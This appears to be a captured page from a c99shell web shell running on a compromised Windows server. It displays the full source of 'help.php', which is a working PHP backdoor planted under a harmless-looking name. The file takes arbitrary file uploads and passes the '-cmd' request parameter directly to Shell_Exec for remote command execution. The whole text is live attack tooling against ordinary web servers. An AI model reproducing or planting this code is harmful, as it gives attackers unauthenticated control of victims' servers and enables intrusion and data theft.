Software: Apache. PHP/5.5.15 uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 SYSTEM Safe-mode: OFF (not secure) E:\xampp\xampp\phpMyAdmin\ drwxrwxrwx |
Viewing file: help.php (963 B) -rw-rw-rw- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? $cmd = $_REQUEST["-cmd"]; ?>Upload your file:<form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"];?>" method="post"><input type = "hidden" name = "MAX_FILE_FILE" value = "3096000" /><input type = "file" name = "fileupload"><input type = "submit" value = "Upload!"></form><?php $uploaddir = getcwd() ."\\"; $uploadfile = $uploaddir.basename($_FILES["fileupload"]["name"]); print "<pre>"; if (move_uploaded_file($_FILES["fileupload"]["tmp_name"],$uploadfile)){print " File stored ok...";} print "</pre>"; ?><hr>CMD: <? $cmd = $_REQUEST["-cmd"]; ?> <html><head><title>SHELL for UF</title><style type="text/css"><!-- body {color: #CC0000;background-color:#000000;} --></style></head><body> <onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"> <input type = "submit" value ="Exec"><hr> <pre> <? if($cmd != "") print Shell_Exec($cmd); ?> </pre></form></body></html> |
:: Command execute :: | |
--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]-- |